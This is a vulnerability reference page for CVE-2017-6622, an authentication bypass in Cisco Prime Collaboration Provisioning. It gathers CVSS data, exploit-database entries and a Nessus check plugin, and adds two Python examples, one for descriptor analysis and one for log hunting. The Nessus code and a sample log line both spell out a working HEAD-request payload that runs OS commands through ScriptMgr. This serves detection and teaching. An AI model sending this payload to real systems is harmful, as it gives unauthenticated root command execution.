CVE-2017-6622 - Missing Authorization vulnerability in Cisco Prime Collaboration Provisioning

CVSS 9.8 - CRITICAL
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: HIGH
Integrity impact: HIGH
Availability impact: HIGH
Tags: network, low complexity, cisco, CWE-862, critical, nessus, exploit available

Summary

A vulnerability in the web interface for Cisco Prime Collaboration Provisioning could allow an unauthenticated, remote attacker to bypass authentication and perform command injection with root privileges. The vulnerability is due to missing security constraints in certain HTTP request methods, which could allow access to files via the web interface. An attacker could exploit this vulnerability by sending a crafted HTTP request to the targeted application. This vulnerability affects Cisco Prime Collaboration Provisioning Software Releases prior to 12.1. Cisco Bug IDs: CSCvc98724.
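The root cause the Summary describes, security constraints that cover only some HTTP methods, is a classic Java servlet misconfiguration: a web.xml <security-constraint> that enumerates <http-method> GET and POST leaves HEAD and every other verb unconstrained, so the same URL answers a HEAD request with no <auth-constraint> applied. The following is an added example for this page, not Cisco's code or the page's own; the two descriptor fragments are constructed to show the pattern (the actual Prime Collaboration Provisioning descriptor is not on the page), and url-pattern values are taken to be relative to the application's context path (/cupm on this product). The analyzer reports which methods reach a path without authentication for the weak descriptor and for a corrected one.

```python
"""Why an unconstrained HTTP method bypasses servlet authentication.

Added example for this page, not Cisco's code or the page's own. The two
web.xml fragments are constructed to show the pattern named in the
Summary (security constraints missing for some HTTP methods); the real
Prime Collaboration Provisioning descriptor is not on the page.
"""
import xml.etree.ElementTree as ET

# Methods worth probing; whatever a constraint does not name stays open.
PROBE_METHODS = frozenset(
    ("GET", "POST", "HEAD", "PUT", "DELETE", "OPTIONS", "TRACE"))

# Weak: the constraint names GET and POST only, so HEAD reaches the
# servlet with no auth-constraint applied (constructed fragment).
WEAK_WEB_XML = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>ScriptMgr</web-resource-name>
      <url-pattern>/ScriptMgr</url-pattern>
      <http-method>GET</http-method>
      <http-method>POST</http-method>
    </web-resource-collection>
    <auth-constraint><role-name>admin</role-name></auth-constraint>
  </security-constraint>
</web-app>"""

# Fixed: no <http-method> list, so the constraint covers every method,
# plus Servlet 3.1's <deny-uncovered-http-methods/> as a backstop for any
# collection elsewhere in the file that does enumerate methods.
FIXED_WEB_XML = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <deny-uncovered-http-methods/>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>ScriptMgr</web-resource-name>
      <url-pattern>/ScriptMgr</url-pattern>
    </web-resource-collection>
    <auth-constraint><role-name>admin</role-name></auth-constraint>
  </security-constraint>
</web-app>"""


def _local(tag):
    """Strip the XML namespace so tags compare by local name."""
    return tag.rsplit("}", 1)[-1]

def _children(elem, name):
    return [c for c in elem if _local(c.tag) == name]

def _texts(elem, name):
    return [(c.text or "").strip() for c in _children(elem, name)]


def pattern_matches(pattern, path):
    """Servlet url-pattern rules: exact, path prefix (/x/*), extension
    (*.ext) and the default pattern (/)."""
    if pattern == "/" or pattern == path:
        return True
    if pattern.endswith("/*"):
        prefix = pattern[:-2]
        return path == prefix or path.startswith(prefix + "/")
    if pattern.startswith("*."):
        return path.endswith(pattern[1:])
    return False


def unauthenticated_methods(web_xml, path):
    """HTTP methods that reach `path` without passing an <auth-constraint>.
    An empty set means every probed method is gated."""
    root = ET.fromstring(web_xml)
    deny_uncovered = bool(_children(root, "deny-uncovered-http-methods"))
    covered = set()
    for sc in _children(root, "security-constraint"):
        if not _children(sc, "auth-constraint"):
            continue  # a constraint without auth-constraint restricts nothing
        for wrc in _children(sc, "web-resource-collection"):
            if not any(pattern_matches(p, path)
                       for p in _texts(wrc, "url-pattern")):
                continue
            listed = set(_texts(wrc, "http-method"))
            omitted = set(_texts(wrc, "http-method-omission"))
            if listed:
                covered |= listed               # only these verbs are gated
            elif omitted:
                covered |= PROBE_METHODS - omitted
            else:
                return set()                    # no list: all methods gated
    if deny_uncovered and covered:
        return set()  # container answers 403 for the unlisted methods
    return set(PROBE_METHODS) - covered


if __name__ == "__main__":
    for label, xml in (("weak", WEAK_WEB_XML), ("fixed", FIXED_WEB_XML)):
        print(label, sorted(unauthenticated_methods(xml, "/ScriptMgr")))
```

Run against the weak descriptor the function returns HEAD, PUT, DELETE, OPTIONS and TRACE for /ScriptMgr; the fixed descriptor returns nothing. The lesson generalizes beyond HEAD: listing verbs in a <web-resource-collection> is an allow-list of what gets protected, not of what is served, so the safe form is to omit <http-method> entirely (or to use <http-method-omission>) and to enable <deny-uncovered-http-methods/> on Servlet 3.1 containers.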

Common Weakness Enumeration (CWE)

CWE-862: Missing Authorization
Exploit-Db

description: Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution. CVE-2017-6622. Remote exploit for Hardware platform
file: exploits/hardware/remote/42888.sh
id: EDB-ID:42888
last seen: 2017-09-29
modified: 2017-09-27
platform: hardware
port:
published: 2017-09-27
reporter: Exploit-DB
source: https://www.exploit-db.com/download/42888/
title: Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution
type: remote

Nessus

  • NASL family: CISCO
    NASL id: CISCO_PRIME_CP_CVE-2017-6622.NASL
    description: The remote Cisco Prime Collaboration Provisioning server is affected by a remote command execution vulnerability in the ScriptMgr servlet due to a failure to restrict the HTTP HEAD method. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands with root privileges. Note that the remote Cisco Prime Collaboration Provisioning server is reportedly affected by additional vulnerabilities; however, Nessus has not tested for these.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 101531
    published: 2017-07-13
    reporter: This script is Copyright (C) 2017-2019 Tenable Network Security, Inc.
    source: https://www.tenable.com/plugins/nessus/101531
    title: Cisco Prime Collaboration Provisioning ScriptMgr Servlet Authentication Bypass RCE
    code:
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(101531);
      script_version("1.6");
      script_cvs_date("Date: 2019/03/06 18:38:55");
    
      script_cve_id("CVE-2017-6622");
      script_bugtraq_id(98520);
      script_xref(name:"CISCO-BUG-ID", value:"CSCvc98724");
      script_xref(name:"CISCO-SA", value:"cisco-sa-20170517-pcp1");
      script_xref(name:"ZDI", value:"ZDI-17-445");
    
      script_name(english:"Cisco Prime Collaboration Provisioning ScriptMgr Servlet Authentication Bypass RCE");
      script_summary(english:"Attempts to perform a remote command injection.");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote network management server is affected by a remote command
    execution vulnerability.");
      script_set_attribute(attribute:"description", value:
    "The remote Cisco Prime Collaboration Provisioning server is affected
    by a remote command execution vulnerability in the ScriptMgr servlet
    due to a failure to restrict the HTTP HEAD method. An unauthenticated,
    remote attacker can exploit this to bypass authentication and execute
    arbitrary commands with root privileges.
    
    Note that the remote Cisco Prime Collaboration Provisioning server is
    reportedly affected by additional vulnerabilities; however, Nessus has
    not tested for these.");
      # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170517-pcp1
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?e00b5d5b");
      script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-17-445/");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to Cisco Prime Collaboration Provisioning version 12.1 or
    later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2017/05/17");
      script_set_attribute(attribute:"patch_publication_date", value:"2017/05/17");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/07/13");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:cisco:prime_collaboration_provisioning");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:cisco:prime_collaboration");
      script_set_attribute(attribute:"exploited_by_nessus", value:"true");
      script_end_attributes();
    
      script_category(ACT_ATTACK);
      script_family(english:"CISCO");
    
      script_copyright(english:"This script is Copyright (C) 2017-2019 Tenable Network Security, Inc.");
    
      script_dependencies("cisco_prime_collaboration_provisioning_detect.nbin");
      script_require_keys("Host/Cisco/PrimeCollaborationProvisioning/version");
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    
    # Make sure pcp is detected
    get_kb_item_or_exit("Host/Cisco/PrimeCollaborationProvisioning/version");
    
    port = get_http_port(default:443);
    
    # Vulnerable ScriptMgr servlet is reached through mod_jk 
    banner = get_http_banner(port:port);
    if (banner !~ "Server:.*Apache.*mod_jk")
    {
      audit(AUDIT_LISTEN_NOT_VULN, "Web server", port);
    }
    
    pat = SCRIPT_NAME;
    if(strlen(pat) > 16)
      pat = substr(pat, 0, 15);
      
    cmd = "ping%20-c%2010%20" + "-p%20" + hexstr(pat) + "%20" + compat::this_host();
    qs = 'command=compile&language=bsh&script=foo&scripttext=Runtime.getRuntime().exec("' + cmd + '");';
    uri = "/cupm/ScriptMgr?" + qs;
    method = "HEAD";
    res = http_send_recv3(
      method        : method,
      item          : uri,
      port          : port,
      exit_on_fail  : TRUE
    );
    
    if(res[0] =~ "^HTTP/[0-9]\.[0-9] 200")
    {
      filter = "icmp and src " + get_host_ip() + " and dst " + compat::this_host()  +
        " and icmp[icmptype] = icmp-echo";
      bpf = bpf_open(filter);
      if(isnull(bpf)) audit(AUDIT_FN_FAIL, "bpf_open");
    
      timeout = 5;
      t  = unixtime();
      repeat
      {
        frame = bpf_next(bpf:bpf);
        # ping back seen: cmd injection succeeded !
        if (frame && pat >< frame)
        {
          vuln = TRUE; 
          break; 
        }  
      }until(unixtime() - t > timeout);
    
      bpf_close(bpf);
    }
    
    if(vuln)
    {
      req = http_last_sent_request(); 
      security_report_v4(
        port        : port,
        severity    : SECURITY_HOLE,
        generic     : TRUE,
        request     : make_list(req)
      );
    }
    else
    {
      audit(AUDIT_LISTEN_NOT_VULN, "Web server", port);
    }
    
  • NASL family: CISCO
    NASL id: CISCO_PRIME_CP_SA-20170517-PCP1.NASL
    description: According to its self-reported version number, the remote Cisco Prime Collaboration Provisioning server is 9.x, 10.x, 11.x, or 12.x prior to 12.1. It is, therefore, affected by multiple vulnerabilities: - An information disclosure vulnerability exists in the web interface when handling HTTP requests. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to disclose sensitive information about the application, such as user credentials. (CVE-2017-6621) - An authentication bypass vulnerability exists in the web interface due to missing security restraints in certain HTTP request methods that could allow accessing files. An unauthenticated, remote attacker can exploit this, via a specially crafted HTTP request, to bypass authentication and execute arbitrary commands with root privileges. (CVE-2017-6622) - A flaw exists in the web interface that allows directory traversal outside of a restricted path due to improper validation of HTTP requests and a failure to apply role-based access controls (RBACs) to requested HTTP URLs. An authenticated, remote attacker can exploit this, via a specially crafted request that uses path traversal, to delete arbitrary files from the system. (CVE-2017-6635) Note that Nessus has not tested for these issues but has instead relied only on the application
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 100323
    published: 2017-05-22
    reporter: This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.
    source: https://www.tenable.com/plugins/nessus/100323
    title: Cisco Prime Collaboration Provisioning < 12.1 Multiple Vulnerabilities (cisco-sa-20170517-pcp1 - cisco-sa-20170517-pcp3)
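The request the Nessus plugin above sends (a HEAD to /cupm/ScriptMgr with command=compile&language=bsh and a scripttext containing Runtime.getRuntime().exec) is also the shape a defender should hunt for in the web front end's access logs. The following is an added example, not Tenable's, Cisco's or the page's own code: it parses Apache combined-format lines (the plugin expects an Apache front end with mod_jk), flags ScriptMgr requests that use a verb other than GET or POST, request a BeanShell compile, or carry a Java OS-command call in scripttext, and reports each hit. The sample log lines, IP addresses and timestamps are constructed for this example; the assumption that the product's own UI drives the servlet only with GET and POST is the author's, not something the page states.

```python
"""Hunt Apache access logs for CVE-2017-6622 exploitation attempts.

Added example, not the page's, Tenable's or Cisco's code. It looks for the
request shape the Nessus plugin on this page sends: a method other than
GET/POST (HEAD in the plugin) to /cupm/ScriptMgr carrying
command=compile&language=bsh and a scripttext with a Java OS-command call.
Log lines are constructed, in Apache 'combined' format; IPs and times are
invented.
"""
import re
from urllib.parse import parse_qs, urlsplit

COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]+" '
    r'(?P<status>\d{3}) (?P<size>\S+)')

SCRIPTMGR_PATH = "/cupm/ScriptMgr"
# Assumption: the product UI only drives the servlet with GET/POST, so any
# other verb against it is worth a look (the page does not state this).
EXPECTED_METHODS = {"GET", "POST"}
EXEC_MARKERS = ("Runtime.getRuntime().exec", "ProcessBuilder")


def parse_line(line):
    """Return the fields of one combined-format line, or None."""
    m = COMBINED.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Reasons a ScriptMgr request looks like abuse, or None."""
    url = urlsplit(entry["target"])
    if url.path != SCRIPTMGR_PATH:
        return None
    qs = parse_qs(url.query)  # percent-decodes values for us
    reasons = []
    if entry["method"] not in EXPECTED_METHODS:
        reasons.append("verb tampering via %s" % entry["method"])
    if qs.get("command") == ["compile"] and qs.get("language") == ["bsh"]:
        reasons.append("BeanShell compile request")
    script = qs.get("scripttext", [""])[0]
    if any(marker in script for marker in EXEC_MARKERS):
        reasons.append("OS command in scripttext: %s" % script[:80])
    return "; ".join(reasons) if reasons else None


def hunt(lines):
    """Return (ip, method, status, reasons) for each suspicious request."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue  # not an access-log line; skip rather than crash
        reasons = classify(entry)
        if reasons:
            hits.append((entry["ip"], entry["method"], entry["status"], reasons))
    return hits


# Constructed sample: ordinary UI traffic, a GET to the servlet that was
# redirected to login, and the HEAD that slips past the constraint. HEAD
# returns no body (size "-") but the server still compiled the script.
SAMPLE_LOG = [
    '10.0.0.5 - - [27/Sep/2017:10:01:02 +0000] "GET /cupm/login.jsp HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [27/Sep/2017:10:01:09 +0000] "POST /cupm/ScriptMgr HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [27/Sep/2017:10:05:40 +0000] "GET /cupm/ScriptMgr?command=compile&language=bsh&script=foo&scripttext=1 HTTP/1.1" 302 - "-" "curl/7.55.0"',
    '203.0.113.7 - - [27/Sep/2017:10:05:44 +0000] "HEAD /cupm/ScriptMgr?command=compile&language=bsh&script=foo&scripttext=Runtime.getRuntime().exec(%22ping%20-c%2010%20198.51.100.9%22); HTTP/1.1" 200 - "-" "curl/7.55.0"',
    'not an access log line',
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(hit)
```

On the sample, the GET that was redirected (302) is reported for the compile request alone, which is useful as reconnaissance, while the HEAD is reported with all three reasons and a 200 status, matching the success condition the Nessus plugin checks for. A HEAD with a 200 and no body is the signature worth alerting on; the absence of a response body is exactly why the Nessus check confirms execution with an ICMP ping-back rather than by reading output.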

Packetstorm

data source: https://packetstormsecurity.com/files/download/144420/cpcp-bypassexec.txt
id: PACKETSTORM:144420
last seen: 2017-09-30
published: 2017-09-29
reporter: Adam Brown
source: https://packetstormsecurity.com/files/144420/Cisco-Prime-Collaboration-Provisioning-Authentication-Bypass-Code-Execution.html
title: Cisco Prime Collaboration Provisioning Authentication Bypass / Code Execution

Saint

bid: 98520
description: Cisco Prime Collaboration Provisioning ScriptMgr HEAD request vulnerability
id: net_cisco_primecollaboration
title: cisco_prime_cp_scriptmgr_head
type: remote